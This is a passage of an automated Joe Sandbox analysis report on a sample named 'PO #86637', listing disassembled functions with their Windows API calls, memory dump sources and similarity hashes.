                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Handle
                      • String ID: nul
                      • API String ID: 2519475695-2873401336
                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                      APIs
                      • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • _wcsncpy.LIBCMT ref: 00401C41
                      • _wcscpy.LIBCMT ref: 00401C5D
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                      • String ID: Line:
                      • API String ID: 1874344091-1585850449
                      • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                      • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                      • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                      • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: SysAnimate32
                      • API String ID: 0-1011021900
                      • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                      • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                      • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                      • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                      APIs
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                      • GetFocus.USER32 ref: 0046157B
                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                      • __swprintf.LIBCMT ref: 00461608
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                      • String ID: %s%d
                      • API String ID: 2645982514-1110647743
                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                      APIs
                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$CloseCountersCurrentHandleOpen
                      • String ID:
                      • API String ID: 3488606520-0
                      • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                      • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                      APIs
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ConnectRegistry_memmove_wcslen
                      • String ID:
                      • API String ID: 15295421-0
                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                      APIs
                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressProc$Library$FreeLoad
                      • String ID:
                      • API String ID: 2449869053-0
                      • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                      • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                      APIs
                      • GetCursorPos.USER32(?), ref: 004563A6
                      • ScreenToClient.USER32(?,?), ref: 004563C3
                      • GetAsyncKeyState.USER32(?), ref: 00456400
                      • GetAsyncKeyState.USER32(?), ref: 00456410
                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                      Similarity
                      • API ID: AsyncState$ClientCursorLongScreenWindow
                      • String ID:
                      • API String ID: 3539004672-0
                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                      APIs
                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                      Similarity
                      • API ID: Interlocked$DecrementIncrement$Sleep
                      • String ID:
                      • API String ID: 327565842-0
                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String
                      • String ID:
                      • API String ID: 2832842796-0
                      • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                      • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                      Similarity
                      • API ID: Enum$CloseDeleteOpen
                      • String ID:
                      • API String ID: 2095303065-0
                      • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                      • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                      • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                      • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00436A24
                      Similarity
                      • API ID: RectWindow
                      • String ID:
                      • API String ID: 861336768-0
                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                      APIs
                      • SendMessageW.USER32 ref: 00449598
                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                      • _wcslen.LIBCMT ref: 0044960D
                      • _wcslen.LIBCMT ref: 0044961A
                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                      Similarity
                      • API ID: MessageSend$_wcslen$_wcspbrk
                      • String ID:
                      • API String ID: 1856069659-0
                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                      APIs
                      • GetCursorPos.USER32(?), ref: 004478E2
                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                      • GetCursorPos.USER32(00000000), ref: 0044796A
                      • TrackPopupMenuEx.USER32(02EE6480,00000000,00000000,?,?,00000000), ref: 00447991
                      Similarity
                      • API ID: CursorMenuPopupTrack$Proc
                      • String ID:
                      • API String ID: 1300944170-0
                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004479CC
                      • GetCursorPos.USER32(?), ref: 004479D7
                      • ScreenToClient.USER32(?,?), ref: 004479F3
                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                      Similarity
                      • API ID: Client$CursorFromPointProcRectScreenWindow
                      • String ID:
                      • API String ID: 1822080540-0
                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                      • EndPaint.USER32(?,?), ref: 00447D13
                      Similarity
                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                      • String ID:
                      • API String ID: 659298297-0
                      • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                      • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                      • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                      • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                      APIs
                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                        • Part of subcall function 00440D98: SendMessageW.USER32(02EE1BC8,000000F1,00000000,00000000), ref: 00440E6E
                        • Part of subcall function 00440D98: SendMessageW.USER32(02EE1BC8,000000F1,00000001,00000000), ref: 00440E9A
                      Similarity
                      • API ID: Window$EnableMessageSend$LongShow
                      • String ID:
                      • API String ID: 142311417-0
                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                      APIs
                      • IsWindowVisible.USER32(?), ref: 00445879
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                      • _wcslen.LIBCMT ref: 004458FB
                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                      • String ID:
                      • API String ID: 3087257052-0
                      • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                      • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                      APIs
                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                      • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                      Similarity
                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                      • String ID:
                      • API String ID: 245547762-0
                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 004471D8
                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                      • SelectObject.GDI32(?,00000000), ref: 00447228
                      • BeginPath.GDI32(?), ref: 0044723D
                      • SelectObject.GDI32(?,00000000), ref: 00447266
                      Similarity
                      • API ID: Object$Select$BeginCreateDeletePath
                      • String ID:
                      • API String ID: 2338827641-0
                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00434598
                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                      • Sleep.KERNEL32(00000000), ref: 004345D4
                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID:
                      • API String ID: 2875609808-0
                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                      • MessageBeep.USER32(00000000), ref: 00460C46
                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                      • EndDialog.USER32(?,00000001), ref: 00460C83
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                      APIs
                      Similarity
                      • API ID: Destroy$DeleteObjectWindow$Icon
                      • String ID:
                      • API String ID: 4023252218-0
                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                      APIs
                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                      • DeleteObject.GDI32(?), ref: 00455736
                      • DeleteObject.GDI32(?), ref: 00455744
                      • DestroyIcon.USER32(?), ref: 00455752
                      • DestroyWindow.USER32(?), ref: 00455760
